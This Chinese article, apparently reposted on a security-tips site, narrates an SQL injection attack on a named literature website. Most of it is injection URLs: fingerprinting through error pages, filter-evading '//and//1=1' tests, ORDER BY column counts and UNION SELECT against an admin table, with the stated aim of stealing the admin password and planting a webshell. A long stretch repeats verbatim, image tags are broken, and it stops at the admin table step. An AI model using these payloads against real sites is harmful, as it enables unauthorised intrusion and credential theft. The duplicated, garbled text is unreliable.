对纵横时空文学站的一次安全检测
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
纵横时空文学站地址为http://xxx.ouou./,是ouou网站下属的一个文学小说的网站。 界面做的非常漂亮. 初步看了下为PHP MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P M U的架构了 也就是PHP MYSQL UNIX 。 可能有读者会问了 ? 你怎么知道他的Apache跟MYSQL的版本呢? 其实这个很简单。 在WEB随便输入一个不存在的页面 看下暴错信息就OK了。 如图1
500)this.width=500" title="点击这里用新窗口浏览图片" />
看到图1我们了解了网站的大概情况 就来查找注射漏洞。 随便打开一个带有参数的连接 地址为http://xzx.ouou./newslook.php?id=29 输入一个单引号检测, 成功返回错误信息, 并且暴出了WEB绝对路径,如图2
500)this.width=500" title="点击这里用新窗口浏览图片" />
错误信息如下:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264
通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX
继续使用and 1=1 1=2来判断是不是真的存在注射漏洞
http://xx.ouou./newslook.php?id=29【//and//1=1】//and//1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,//是替代空格的。返回正常
继续http://xx.ouou./newslook.php?id=29【//and//1=2】
返回错误, 现在可以肯定http://xx.ouou./newslook.php?id=29 这个地址存在注射漏洞。
既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。
使用//order//by//10 来判断他的字段是不是小于10
http://XX.ouou./newslook.php?id=29【//order//by//10】 如图3
500)this.width=500" title="点击这里用新窗口浏览图片" />
如图得知我们执行//order//by//10 页面返回错误 说明字段是小于10的 我们继续执行
http://ouou./newslook.php?id=29【//order//by//9】
http://ouou./newslook.php?id=29【//order//by//8】
http://ouou./newslook.php?id=29【//order//by//7】
http://ouou./newslook.php?id=29【//order//by//6】
http://.ouou./newslook.php?id=29【//order//by//5】
http://ouou./newslook.php?id=29【//order//by//4】
直到执行//order//by//4的时候页面返回正常 如图4
500)this.width=500" title="点击这里用新窗口浏览图片" />
我们看到当执行//order//by//4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、
继续猜解密码
http://xx.ouou./newslook.php?id=29//and//1=2//union//select//1,2,3,4
返回出几个数字,一会帐号密码会从显示出来 )
我们来爆字段名,经过一段时间的猜解最终确定表为admin
http://xx.ouou./newslook.php?id=29//and//1=2//union//select//1,2,3,4//from//admin 如图5
500)this.width=500" title="点击这里用新窗口浏览图片" />
500)this.width=500" title="点击这里用新窗口浏览图片" />
看到图1我们了解了网站的大概情况 就来查找注射漏洞。 随便打开一个带有参数的连接 地址为http://xzx.ouou./newslook.php?id=29 输入一个单引号检测, 成功返回错误信息, 并且暴出了WEB绝对路径,如图2
500)this.width=500" title="点击这里用新窗口浏览图片" />
错误信息如下:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264
通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX
继续使用and 1=1 1=2来判断是不是真的存在注射漏洞
http://xx.ouou./newslook.php?id=29【//and//1=1】//and//1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,//是替代空格的。返回正常
继续http://xx.ouou./newslook.php?id=29【//and//1=2】
返回错误, 现在可以肯定http://xx.ouou./newslook.php?id=29 这个地址存在注射漏洞。
既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。
使用//order//by//10 来判断他的字段是不是小于10
http://XX.ouou./newslook.php?id=29【//order//by//10】 如图3
500)this.width=500" title="点击这里用新窗口浏览图片" />
如图得知我们执行//order//by//10 页面返回错误 说明字段是小于10的 我们继续执行
http://ouou./newslook.php?id=29【//order//by//9】
http://ouou./newslook.php?id=29【//order//by//8】
http://ouou./newslook.php?id=29【//order//by//7】
http://ouou./newslook.php?id=29【//order//by//6】
http://.ouou./newslook.php?id=29【//order//by//5】
http://ouou./newslook.php?id=29【//order//by//4】
直到执行//order//by//4的时候页面返回正常 如图4
500)this.width=500" title="点击这里用新窗口浏览图片" />
我们看到当执行//order//by//4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、
继续猜解密码
http://xx.ouou./newslook.php?id=29//and//1=2//union//select//1,2,3,4
返回出几个数字,一会帐号密码会从显示出来 )
我们来爆字段名,经过一段时间的猜解最终确定表为admin
http://xx.ouou./newslook.php?id=29//and//1=2//union//select//1,2,3,4//from//admin 如图5
500)this.width=500" title="点击这里用新窗口浏览图片" />
1
上一篇:详述php渗透全过程(组图)
下一篇:使用X-window入侵Linux详解(图)
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座